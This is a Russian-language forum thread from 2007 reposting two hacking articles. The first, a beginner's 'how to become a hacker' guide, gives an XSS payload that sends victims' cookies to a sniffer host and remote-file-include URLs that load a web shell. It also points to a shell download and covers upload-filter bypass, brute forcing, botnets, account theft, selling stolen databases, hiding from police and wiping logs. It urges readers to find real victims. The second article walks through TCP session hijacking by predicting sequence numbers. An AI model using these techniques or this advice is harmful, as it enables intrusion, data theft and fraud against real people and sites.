Статьи по Хакингу

ddd · 14 июл 2007

Статья: Как стать хакером
Источник: http://www.hackzone.ru/

Данная статья написана для того чтобы облегчить жизнь и счета за траффик мемберов hackzone.ru и попытаться ответить на первый вопрос многих вошедших впервые в сеть - КАК СТАТЬ ХАКЕРОМ? Примечание: сам автор статьи не является высококвалифицированным хакером, так что не думайте, что это понты :)++
Кстати статья не перелизана и не переделана. Мнение автора может не совпадать с вашим. Статья не полная. Позже будут обьеснены другие аспекты, но уже в других статьях или эти же аспекты, но более подробно.

Глава №1: С чего начать?

Прежде чем начнём давай условимся, что я не буду расказывать тебе как проводить инъекции, искать и реализовывать xss и прочую лабуду ( нет, ну конечно некоторые аспекты не повредят юному мозгу), я просто наставлю тебя на путь истинный. Итак, начнём!
Как выбрать OS? Многие говорят, что хакеры сидят только под UNIX, не верь,большинство авторов этих лживых постов ютят у себя на винте ВЫНЬ. Операционная система должна соответствовать твоим требованиям. Только не надо сейчас бежать в магазин за диском со свежайшим дистрибутивом пингвина( LINUX ) или демона( FreeBSD ) или фуги (OpenBSD ). OS UNIX очень сложна. Конечно нынешние дистрибутивы UNIX похожи на окна, но всё же. Килобайты команд надо держать у себя в голове и постоянно долбить по клавишам, одновременно смотря на чёрный как моя кошка терминал! Тебе это надо? Спорю на что угодно, что за первый день своего пребывания в Unix ты не сможешь подключить интернет! А в винде всё просто! И только истинные ламеры где то услышав громкие лозунги тупо выкрикивают, что Винда самая глючная система в мире, что его заколебали вирусы и ошибки. Нет респекта этим людям, не потому, что они выбирают ЛИНУКС, а потому, что они повторяют эту бессмыслицу. Вот главное отличие хакера, он должен быть уникален по своему, у каждого должна быть своя феня. Кстати у меня очень редко виснет Винда, а последний вирус я не помню когда поймал! В Винде очень много программ. Это отличная среда разработки, хотя некоторые языки зарождались в недрах линукс. В вопросах с безопасностью конечно рулят Никсы. Нет, ну конечно же там есть вирусы, но их очень мало. Почему? Потому, что нету смысла.С правами nobody ты вряд ли, что-нибудь сделаешь.Конечно же есть некоторые способы получения привелегий на тачке, разумеется через дыры в продуктах (нет,не в продуктах питания, а в самой системе и прогах.Кстати в сыре тоже есть дыры, а в бублике вообще огромная дыра, но вряд ли её когда нибудь залатают):).
Ну а если хочешь убить двух зайцев сразу советую испоьзовать виртуальные машины, н-р: VMWare, virtual PC от M$. Но помни, если погонишься за двумя зайцами сразу получишь люлей от лесника. Поставленная виртуалка будет жутко тормозить даже на нормальной тачке. Кстать Веб Мани под VMWare не пашутЪ ( об этом отдельная статья взятаю у Криса Касперски, о том как WebMoney Keeper Classic выдаёт очень много инфы в сеть, может стать даже трояном с которым ты подписал лицензионое соглашение:)!

Глава №2:
Весьма странный вопрос я считаю:" какие языки нужно учить, чтобы стать хакером?". Отвечаю:" какие языки нужно учить чтобы стать хакером я не знаю, но хорошие разумеется перечислю со всеми их возможностями: C,C#,C++ - это супермощная среда разработки под все платформы, эксплойты пишутся чаще на них, ООП это круто.
(об эксплойтах мы поговорим позже ) , Visual Basic - самый медленный после Java язык, но чаще всего на нём пишуться вирусы, Java - я не уверен, что тебе это надо, Delphi,Pascal - мощная среда для разработки программ, маленьких и быстрых, кто-то говорит, что маленьких программ на Дельфине не бывает тот не прав, сейчас Дельфи единственный конкурирующий с C++,C язык ( хотя мы с тобой знаем, что С++ лучше ), Assembler - О, да, АSM - это тяжёлая артилерия для всего угодно ( сплойтов, программ, вирусов ), Perl - непохой язык, появилось множество уязвимостей в скриптах из-за ошибок разработчиков, PHP - схожий по синтаксису с СИ язык, идеально подходит для многих целей ( Для разработки под ВЕБ) н-р: скрипты, эксплойты, работа с БД, рисование и т.д., SQL - очень нужен в нашей профессии для того чтобы составлять запросы к мускулу для выуживания БД (баз данных) ( учить весь язык замучаешься, лучше почитать парочку статей по основным запросам ). Здесь я не привёл ещё много языков которые устарели или не актуальны ( н-р: JavaScript ну на кой он тебе нужен, чтобы куки выуживать?, Lisp, Ada )!

Глава №3: Категории атак.
Идём всё ближе к цели!
1. XSS - наверное все слышали про Cross Site Scripting ( помоему переводится как "внедрение кодав страницу" ). Что можно поднять с помошью Xss спросишь ты? Поднять можно куки (cookie - печенье).
Зачем они нужны? С помощью кукисов ты идентифицируешься на сайте, т.е. в них хранится инфа о пользователе для сайта. Куки передаются методами POST and GET. Xss бывают активные, пассивные, полуактивные, нестандартные. В этой главе мы рассмотрим только нестандартные и простые X$$!

document.images[0].src="http://адрес снифера/s.gif"+document.cookieПростые - это что-то типа этого ""(писать без кавычек)
Но не всегда присутствует эта уязвимость на сайтах. Есть ещё несколько подводных камней - это фильтрация символов,
alert(document.cookie)браузер жертвы, интелект админа! Н-р: я однажды нашёл одну xss-ky , вбиваю и
мне выплёвывают мои куки ( это было в IE 6 ), захожу в Opera 8 нифига не пашет!
Фильтрация это вообще неприятная вешь, парсеры фильтруют знаки такие как (< >,/,+,|,пробел,$,',",; иногда () ).
Вот сим-таблица -
Сим ; / ? : @ = & < > " #
Код %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Сим { } | \ ^ ~ [ ] ` % '
Код %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27

2. SQL-Injection - самый популярный вид атаки о котором все слышали. Вы спросите почему Скуль- ИНЪЕКЦИЯ.
Инъекция - это внедрение препарата во что-нибудь, также и здесь, мы внедряем запросы в базу и получаем что хотим. Об инъекциях ты можешЪ почитать в соседней статье. Но вообще БД это лакомый кусок для хакера, в конце концов их можно продать. Очень высоко ценятся банковские базы, базы онлайн обменников. Вы спросите для чего они нужны покупателям - это же элементарно, в них хранятся мэйлы, логины, пароли, адреса, аськи, телефоны, пин-коды.
Но насчёт паролей обольщаться не стоит, в большинстве случаев они зашифрованы (нет не симкой:).
3. Google Hack - это поиск уязвимостей через самый крутой поисковик в мире - GOOGLE.COM,RU,KZ:)!
Подробнее прочитай мою статью про Google Hack!
4.DDoS - наверное ты не раз мечтал положить сайт неприятеля Васи Пупкина, чтобы тот очнулся только через дней пять.
ДДоС - это отправка пакетов на сайт ( то есть флужения ). Для организации ДДоС-а у тебя должна быть своя бот-сеть.
Бот-сеть образуется из компов захваченных тобою и находящихся под твоим надзором - своеобразные зомби.
Без бот сети, у тебя вряд ли что получится.
5. Include - способ хороший, но не всегда прёт. Способ банально прост, благоаря ошбкам програмиста у тебя появляется шанс
залить свой файл на сервант (сервер).
Вот некоторые примеры - http://la-la.fuck/index.pl?file="http://your_site/shell.php,txt,pl"(ага)
la-la.ru/lox.pl?open="/index.html,pl,php"
Хитрости: например хитрые администраторы ставят редиректы ( перенаправление на другую страницу )
Н-р: http://site1/link.php?u=la-la.ru - вот редирект
С помощью этого бага можно провернуть и Xss и Include.
Н-р: http://site1/link.php?u= <scri
pt%3Ealert(document.cookie)%3C
http://site1/link.php?u=http://la-la.ru/shell - без указания расширения, а то парсер запалит.

Ещё есть такой прикол как обход фильтра по расширению. Бывает что на сервер позволяют залить некий файл, картинку, без разницы, но с особым разрешением GIF,JPG и т.д. Бывает, что фильтрации вообще нет:). А если есть? Тогда методы наши будут хитрее. Мы сменим разрешение так "myfile.jpg.php", хотя я сомневаюсь, что данный метод будет работать, потому-что парсеры стали намного умнее. Ты конечно понял, что никаких картинок мы качать не будем, а зальём полноценный веб шелл или ещё какую-нибудь штучку. Шелл лучше брать от ныне закрывшейся или переехавшей ныне команды RST. По крайней мере rst.void.ru больше нету, а жалко, клёвая была группа, а какие эксплойты, загляденье. Но взять очень клёвый шелл можно по адресу с моего сайта scooterstar.narod.ru/shell.txt (расширение txt можно убрать:). Там кроме этого ничего нет, не бойся это не вирус, а если антивирус будет на него ругаться не бойся, вирусов с расширением txt я ещё не видел. Кстати, ты спросишь как шелл запустится на сервере? Отвечаю:" Он написан на языке перл, перл - это интерпритатор ( так вроде:), эксплойт запустится сам, только укажи путь к интерпритатору, н-р: !usr/bin/perl, в Выне адрес и perl.exe.
7.Бруфорс - брутфорс (от лат. "Грубая сила") это банальный подбор паролей по словарюк различным сервисам, не ко всем.
Хорошие брутфорсы - это Brutus или THC Hydra for Windows and UNIX.
8.ICQ Hacking - тебе никогда не хотелось иметь красивый номерок Аськи ( я думаю ты знаешь, что это )?
Вот мне лично нет. Но тебя я посвящу. У меня было пара шестизнаков, но их потом вернули обратно и владельцам. Ирония судьбы, но это так. Лучший способ получить красивый UIN - это купить его, а что, пусть дорого, но законно. Ладно если у тебя нету лишних маней гляди сюда. Второй лучший способ после купли аськи - это брут асек.
Третий способ, на многих форумах или сайтах делают конкурсы, победителю - аська. Продвинутый гигант по
ICQ Hacking это софтина ICQ Tools! Точно не знаю где её взять, но точно помню, что с её помощью я заполучил свой первый шестизнак.
Другой, более грубый способ - это взлом Шопов барыгующих UIN-ами с помощью способов приветённых выше или ниже.
9.Протроянивание, впаривание вирусов - способ ужасно грубый, так что мы его рассматривать не будем.
Думаю многие из нас ловили вирусы! Мне за компьютер обидно, он ведь по своему тоже живой:) Вот тебе понравится если в твою задницу засунут червяка:) Я уже про BackDoor (тайная лазейка) не говорю:)
10.Си - нет это не C#, C++(forever),C - это социальная инженерия, способность манипулировать людьми.
СИ в сети заниматься значительно легче чем в реале. Почему? Глупый вопрос, в интернете жертва не слышит твой голос не видит твоего лица, не знает сколько тебе лет. Разговор по той же Аське значительно легче, чем в реальной жизни, согласись. Например Кевин Митник прекрасно владел СИ и постоянно дурил крупные компании. Ты конечно же наслышан про Митника.
11.Кидалово - во преки всем матам в мою сторону я считаю, что кидалово тоже вид хаКа. Ведь там задействована СИ и много других аспектов. Сам я не кидала, не подумай чего. Есть падонки которые кидают нормальных людей на очень большие
деньги, н-р: Джакс, если хочешь глянуть не в списке кидал ли твой партнёр глянь на kidala.info. Обычно конечно кидают лохов, которые в первый раз сели за компьютер.
12. Взлом мэйла - самый помоему желанный метод для многих новичков. Есть несколько способов вхлома мэйла - это брутфорс (в интернете полно программ для взлома ящиков под разные OS).
Сейчас мы прошли некоторые аспекты, хотя не все, следовало бы обратиться к вардрайвингу, крэкингу, фрикингу, кардингу, NetWork Hacking, Kernel Hack, разное прикольное западло и ещё много-много всего. Позже я обязательно об этом напишу. Статья ещё не закончилась, так что читай дальше.
Deface - очень прикольная вешь. С дефейса практически ничего нельзя поднять кроме мести админу сайта.
В чём суть дефейса? Ты находишь уязвимость в сайте или получаешь доступ к админке и заливаешь на главную страницу картинку или прикольный текст (что хочешь), можно вообще стереть index.html, php,pl.
Вообще вешь прикольная, только сдесь надо знать либо html либо JavaScript.

Глава №4: Безопасность.
Ты думаешь, что за взломы тебе ничего не светит? Ошибаешься, глянь на Митника, МакКиннона.
Митнику хотели приписать 300 лет тюрьмы, а МакКиннону присваивают 60:)
Что главное для хакера, правильно - Анонимность в сети.
Рассмотрим некоторые из них.
Proxy - крайне небезопасный способ в последнее время. Почему? Да потому, что я на 80% уверен, что ты пользуешься халявными проксиками, а многие из них как извесно находятся под наблюдением правоохранительных органов или мертвы.
Лучше пользоваться цепочкой прокси, так надёжнее и выгоднее.
VpN - дороговатое удовольсвие но весьма эффективное. Это сервер почти полностью отданый под твоё распоряжение.
Анонимайзеры - признаюсь честно, я им не доверяю, очень тормознуто работают, если хочешь попробовать гляди у SpiderWebb-a в личке сайт или в google.ru(forever).
Некоторые советы: храни файлы и запускай брутфорсы и прочую лабуду на webshell-ах. Н-р: www.freeshell.org - крайне хороший сервис регистрация через telnet, ОСъ NetBSD 4.0, море утилит, срок действия шелла 90 дней.
Веб шелл это своеобразный VPN, хранилище файлов, безопасный запуск программ и анонимная закачка шеллов.

Регулярно чисти History и кэш в браузере.
Чисти логи с помошью утилиты Vanish (под Линукс).
Установи нормальный firewall and antivirus, хоть ты и начинающий хакер, но тебе не понравится если к тебе червяки полезут. На брандмауэр Винды не обращай внимание, он ничего не умеет, кроме как блокировка, разблокировка программ и игрушек, которые приходится каждый день разблокировывать. (прикольная скороговорка:)

Глава №5: Литература - очень знойный вопрос для всех. Вы думаете, что прочитав книжку от неизвестного автора - "Как стать хакером" всему научитесь и будете взламывать серверы NASA and FBI. Ещё чего, если бы всё было так, то от их серваков не осталось бы даже пепла:) Помни, что авторы таких книжек зарабатывают на названии. Доказано, что 70% покупателей книжек смотрят на название, а не на содержание текста. Тем самым становится всё выгоднее писателям, которые выбрали этот брэнд. Насчёт языков програмирования безспорно рулят Буки (books - книги). Плюс неплохо бы тебе хорошо освоить винду. Да, я знаю что ты уже познал все окна и тебе это не нужно. Ошибаешься, несмотря на свою простоту, разобраться с Виндой подчас сложновато. Особенно с некоторыми встроенными прогами.
Разве ты не мечтал написать СВОЙ убийственный вирус или эксплойт под новую Висту. Познай ядро, реестр и ещё туеву хучу модулей, узнай как внедрять код в процессы, ну конечно нужно знать Ассемблер+Visual_Basic+C#,C+модули_ под_них+Библиотеки и т.д. Короче, на начальном этапе тебе нечего забивать голову всякой фигнёй, как например "Библия хакера 2" ( не первая, первая от Криса Касперски обалденная вещь ). Книга была актуальна года четыре назад.
Читай статьи от авторитетных хакеров Крис Касперски, ЗАРАЗА, Terabyte, Coban2k ( автор Пинча ).
Так же не забывай почитывать свежие статейки на форуме и bugtrack-rss-лентах hackzone.ru,
спрашивай совета от мемберов хакзоны, не стесняйся, мы злые только тогда, если поступают тупые вопросы
н-р: если можно, взломайте тот-то сайт, пожалуйста. Помни друг, что спасибо в карман не положишь, на хлеб не намажешь и пива "Пожалуйста" нет. Но ты же не такой как все ( смотри первую главу ).
Совет: никогда не читай журнал "Хакер"(почему? Не читай и всё! Это журнал не от истинных хакеров, все статьи там пишутся за деньги, поэтому не могут быть правдивыми или хорошими, единственные кого я уважаю в "Хакере" - это Даня Шеповалов(ныне работающий в журнале про звёзд Bravo), Gorlum - его статьи про С++ меня часто выручали, Крис Касперски - обалденный эксперт знающий очень много про Юникс и Виндовс, знает очень много языков програмирования.).
Совет 2: Читай истинно хакерские E-zine н-р: xaoc, Defaced, Xakery Ezine, Codepimps, Mazafaka, Infected Voice.
Не ленись узнавай аськи у мемберов hackzone.ru, только слишком не приставай, а то пустят в игнор.

Главу Style, Soft я пропущу так как выбирать софт и свой стиль только тебе ( первая глава ).

Глава №6: Объекты для атаки.
Так, прочитав эту статью ты наверное будешь думать, что-бы взломать.
СОВЕТ: Попробуй обратиться к google.ru (глянь в статье GOOGLE Hack) поищи жертв и потренируйся.
Тырани пару баз. Только не забывай об анонимности, не редко спец службы ставят западню на таких сайтах.

Кстати, я тебе не объяснил, что такое эксплойт (сплойт) - эксплойт это прога (скрипт), написанный чаще всего на C++(forever),
помогающая получить доступ на тачку. Разумеется, под отдельные версии ОСИ или Программ отдельные эксплойты, потому что баги латают( придумывают патчи(заплатки) ).

Статья не полная. Я просто не хотел печатать книгу. Если что, я буду писать другие статьи про РЕал-кардинг, крэкинг, фрикинг, пранк:). Будут вопросы стучи в асю или на мыло. То и другое можно узнать на hackzone.ru в личке. Надеюсь эта статья развеяла все твои иллюзии по поводу хакерства и убедила, что это не так то просто как кажется. Мнение автора не всегда совпаает с мнением читателя!
Нажмите, чтобы раскрыть...

ddd · 9 сен 2007

Статья: "Как стать участником чужого TCP соединения (hacking)"
Источник: http://world-of-hack.clan.su

Введение.
Доброго времени суток. На этот раз предлагаю Вам обсудить довольно сложную тему, а именно как войти в систему не зная пароля и даже имени пользователя. Итак приступим. Многие слышали выражения типа "Зателнеться по такому-то порту" или "Залей сниффер по ФТП-шнику" и т.п. И многие из Вас телнетились или заходили по ФТП на сервер. Ну и что там видно после соединения? Да ничего хорошего. Удаленная машина упорно талдычит "введи пароль". Ну а где нам взять пароль, если мы впервые на этом сервере? Серьезная проблема, не так-ли? Ладно, давайте ее и решать.
Есть предложение воспользоваться вот какой возможностью. А почему бы не переждать, пока настоящий пользователь не зарегистрируется в системе и потом не перехватить его сессию. Заманчиво, правда?

Теория.
Протокол TCP (Transmission Control Protocol) является одним из базовых протоколов транспортного уровня сети Internet. Работа с этим протоколом подразумевает создание непосредственного виртуального соединения, контроль ошибок, повторную пересылку поврежденных пакетов, четкую последовательность пересылки самих пакетов и разрыв соединения в конце сеанса. Нам интересен этот протокол именно потому, что такие известные протоколы прикладного уровня как FTP и TELNET реализованы на его базе. Для опознавания TCP-пакета в его заголовке существеет два 32-разрядных идентификатора, они же в свою очередь служат и счетчиками пакетов. Я имею в виду Sequence Number и Acknowledgment Number. Еще одно немаловажное поле - Control Bits.
Это поле размером 6 бит может содержать следующие командные биты (слева направо):
URG: Urgent Pointer field significant
ACK: Acknowledgment field significant
PSH: Push Function
RST: Reset the connection
SYN: Synchronize sequence numbers
FIN: No more data from sender

Ну что ж, в основную теорию, надеюсь, въехали, пойдем далее. Рассмотрим как происходит процесс соединения по протоколу TCP.

Как происходит ЭТО.
Допустим компьютеру "Клиент" (в интернете каждый компьютер умные люди зовут хостом, а чем мы хуже этих людей?) необходимо создать соединение с хостом "Сервер". Это соединение происходит в 3 этапа:
Первым делом клиент как бы здоровается и посылает пакет серверу с установленным битом SYN (synchronize sequence number), а в поле Sequence Number установлено начальное 32-битное значение (обозначим его как ISSкл) (Initial Sequence Number).
Сервер тоже здоровается с клиентом (он тоже культурный) и посылает свой пакет, в котором отмечены бит SYN и бит ACK. В поле Sequence Number сервер устанавливает свое начальное значение - ISSсерв. Но это еще не все. Тут сервер начинает хитрить и в поле Acknowledgment Number ставит значение ISSкл, полученное в первом пакете от хоста "Клиент" да еще и увеличенное на единицу.
Но клиент тоже не лыком шит и тоже отвечает хитростью: он посылает свой пакет, где установлен бит ACK; поле Sequence Number содержит ISSкл + 1, а поле Acknowledgment Number содержит значение ISSсер + 1.
Тут процесс братания хостов и заканчивается. Виртуальное соединение считается установленным.
Повторим схемотично, что же происходило:
Клиент - > Сервер: SYN, ISSкл
Сервер - > Клиент: SYN, ACK, ISSсер, ACK(ISSкл+1)
Клиент - > Сервер: ACK, ISSкл+1, ACK(ISSсер+1)

Вот теперь, отрекомендовавшись у Сервера, Клиент может преспокойно отсылать свои пакеты данных, не забывая при этом менять поля ACK, ISSкл+1, ACK(ISSсер+1) и DATA.

Разбор полета.
Из предыдущего раздела мы видим, что на этапе установки соединения (когда хосты здороваются) опознавание пакетов осуществляется только по Sequence Number и Acknowledgment Number. Тут сразу становится ясно, что для формирования ложного TCP-пакета нам достаточно знать текущие значения идентификаторов для данного соединения - ISSкл и ISSсер. Усугубляет картину еще и то, что FTP и TELNET вовсе не проверяют подлинность пакетов, полагая, что это сделает за них транспортный уровень. Отсюда вывод: внедрившись в процесс передачи данных на транспортном уровне можно послать пакет с любого хоста в сети Internet не зависимо от потокола (TELNET или FTP) от имени одного из участников данного соединения (например, от имени клиента), и данный пакет будет воспринят как верный! К тому же, постольку поскольку FTP и TELNET не проверяют IP адрес отправителя, то ответ на ложный пакет придет по указанному в нем адресу. Бедный же хозяин пакетов (Клиент) попросту отвалится из-за рассогласования счетчиков (сервер нас уже посчитал).

Дядь, дай десять копеек.
Ну что ж осталось дело за малым. Надо рассчитать ISSкл и ISSсер, а также предсказать динамику их изменения. Это самая сложная задача, но мы трудностей не боимся. (Он сказал "Поехали!" и взмахнул рукой).

Случай 1 (простой).
Предположим, что мы находимся в том же сегменте сети, что и атакуемый хост. Дело за малым. Ставим сниффер, направляем весь трафик через свой хост и смотрим за клиентами, подключающимися к серверу. Конечно же нас интересуют только пакеты со значениями ISSкл и ISSсер (можно даже не интересоваться содержанием поля DATA, т.е. анализировать только заголовки). Итак. Собираем информацию, ищем зависимость, составляем формулу и в путь.

Случай второй (сложный).
Предположим, мы находимся в другом сегменте сети и проанализировать трафик нам не удастся.
Для начала нам надо определить ISN - Initial Sequence Number, т.е. как ОС формирует начальное значение. По документации протокола TCP (RFC 793) рекомендуется увеличивать значение этого 32-битного счетчика на 1 каждые 4 микросекунды, но на практике это далеко не так. Например, в Linux 1.2.8 это значение вычисляется по такому закону:

ISN=mcsec + 1000000 sec, где mcsec - время в микросекундах;
sec - текущее время в секундах, причем отсчет его идет от 1970 года.

в Windows NT 4.0:

ISN=10 msec, где msec - текущее время в миллисекундах.

ОК, На этом и сговоримся. Закон вычисления ISN зависит от времени и представляет функцию

ISN=F(mсsec)

Вид же самой функции F можно получить проанализировав исходный код ядра. Тут Вы сразу закричите: "Да ты гонишь, где же достать исходники Windows?!" Да, трудновато. Придется импровизировать.
Представим ОС "черным яциком" и проведем серию тестов запрос-ответ, причем фиксируя время между запросом и ответом на него, а также время между запросами. (Проще говоря, прикинемся обезьяной с часами, и будем просить соединения у сервера, записывая изменения ISN во времени).
В результате получится такая таблица значений

ISN(1) - T(1)
ISN(2) - T(2)
ISN(3) - T(3)
...
...
...
ISN(N) - T(N)

Здесь ISN (i) - значение ISN, полученное в момент времени i, а T(i) - время от начела эксперимента (время начала возьмем за 0).
Проанализировав результаты наблюдений, можно составить функцию

ISN(t)=F(t)

С ее помощью уже можно получив ответ, предсказать значение ISN через определенный промежуток времени.
Сразу оговорюсь. Не обязательно нападать с подобными тестами на интересующий нас хост. Можно просто найти такой жи тип ОС, что и там и протестировать ее, а результат (полученную функцию) записать и применить уже в деле.
Вот, собственно, и все. Осталось дождаться, когда пользователь зарегистрируется в системе, введет логинпароль и начнет работу. Какие наши действия? Прогнозируем нимер ISN, создаем пакет с заполненными полями ACK, ISSкл+1, ACK(ISSсер+1) и DATA и, если повезет захватываем сессию. Если не повезло, немного меняем ISSкл вместе с ACK(ISSсер+1) и за старое. Рано или поздно значения будут верными. Тут нам откроются такие возможности! Этими средствами можно даже захватить сеанс полозователя root. Представить страшно.
Вот таким далеко не простым способом можно проникнуть в любую систему. Желаю удачи!
Нажмите, чтобы раскрыть...

Вход

Статьи по Хакингу

ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿